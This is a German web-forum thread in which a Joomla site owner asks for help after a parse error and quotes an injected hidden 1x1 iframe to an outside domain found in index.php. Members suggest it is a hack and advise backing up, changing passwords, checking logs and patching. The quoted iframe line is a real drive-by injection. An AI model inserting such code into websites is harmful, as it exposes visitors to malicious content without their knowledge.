Antworten auf deine Fragen:
Neues Thema erstellen

Joomla Seite nicht mehr erreichbar: Parse Error

bonn

DSLR-Amateur-Fotograf

Hallo,
ich wollte heute an meiner Homepage (geperrter Modus in Joomla) wieder weiterarbeiten,
doch ich kann die Startseite nicht mehr aufrufen. Es kommt folgende Fehlermeldung:

Parse error: syntax error, unexpected '<' in /users/bonn/www/index.php on line 88

Mir ist beim Betrachten der Zeile 88 aufgefallen, dass dort ein mir unbekannter neuer Eintrag eines iframes sich befindet.
Der Code der Zeile:
Code:
echo  JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe  src="http://zxstats.com/" width="1" height="1"  frameborder="0"></iframe></body></html>
Wurde meine Seite gehackt?
Was ist passiert? Was soll ich tun?
Ich habe in den letzten 3 Wochen nichts geändert.
Bisher konnte mir noch absolut niemand helfen, daher wende ich mich an euch.
Danke für die Hilfe
 
Zuletzt bearbeitet:

Samuelll

Aktives Mitglied

AW: Joomla Seite nicht mehr erreichbar: Parse Error

Der Fehler selbst sagt erstmal nur, dass im Code ein "<" zuviel steht.

Ein IFrame klingt durchaus nach einem Hack.

Wenn du im Netz nach Joomla gehackt suchst, wirst du genug detailierte Anleitungen finden, wie vorzugehen ist.

Kurz gefasst ist folgendes Sinnvoll :

Datenbank und Webspace erstmal sichern (kopieren) und dann löschen.

Passwort für FTP und ggf. auch den Account beim Hoster ändern.

Den Hoster informieren und in den Logs schauen, ob und wo der Angreifer in die Seite hinein gekommen ist. Ab diesem Punkt kann man sehr viel Aufwand treiben und versuchen alte Inhalte zu retten.
Ist die Seite klein, kann man sie aber auch einfach neu wieder aufbauen.

Im Zweifel hilft ein Profi sicher weiter, was aber dann nicht günstig ist.
 

sppopeid

Foto-Amateur

AW: Joomla Seite nicht mehr erreichbar: Parse Error

Wenn ich versuche, deine Seite zu erreichen, wird sie mir als attackierend gemeldet.
 

bonn

DSLR-Amateur-Fotograf

AW: Joomla Seite nicht mehr erreichbar: Parse Error

Mmmh als attackierend gemeldet? Ich hab die Seite schon vom Netz genommen, per htacess vom Zugriff geschützt, nun ist auch noch der Server deaktiviert. Man kann die Domain also eigentlich gar nicht mehr erreichen. Wieso wird sie dann aber als verseucht gemeldet? Ratlos.
Wie bekomme ich heraus, sobald ich meine Sicherung wieder aufspiele wo die Lücke war, bzw. was ich verändern sollte?
Habe mir bisher eigentlich Mühe gegeben Sicherheit zu gewährleisten u.a. durch diverse Tipps und speziellen Extensions für Joomla.
 

Samuelll

Aktives Mitglied

AW: Joomla Seite nicht mehr erreichbar: Parse Error

Das BackUp solltest du erst wieder hochladen, wenn die Lücke sicher geschlossen wurde, also das BackUp "repariert" hast.

Sofern die Joomlainstallation und alle Extensions aktuell sind, und es keine bekannten Sicherheitslücken für diese gibt, ist der Server-Log die nächste Anlaufstelle.

Entsprechend hier nochmal der Verweis auf diverse Joomla-Community-Foren, wie zB joomla.os wo du zu dem Thema sicherlich mehr findest.
 
Bilder bitte hier hochladen und danach über das Bild-Icon (Direktlink vorher kopieren) platzieren.
Antworten auf deine Fragen:
Neues Thema erstellen

Willkommen auf PSD-Tutorials.de

In unseren Foren vernetzt du dich mit anderen Personen, um dich rund um die Themen Fotografie, Grafik, Gestaltung, Bildbearbeitung und 3D auszutauschen. Außerdem schalten wir für dich regelmäßig kostenlose Inhalte frei. Liebe Grüße senden dir die PSD-Gründer Stefan und Matthias Petri aus Waren an der Müritz. Hier erfährst du mehr über uns.

Stefan und Matthias Petri von PSD-Tutorials.de

Nächster neuer Gratisinhalt

03
Stunden
:
:
25
Minuten
:
:
19
Sekunden

Neueste Themen & Antworten

Flatrate für Tutorials, Assets, Vorlagen

Zurzeit aktive Besucher

Statistik des Forums

Themen
118.565
Beiträge
1.538.067
Mitglieder
67.488
Neuestes Mitglied
Andrew56524
Oben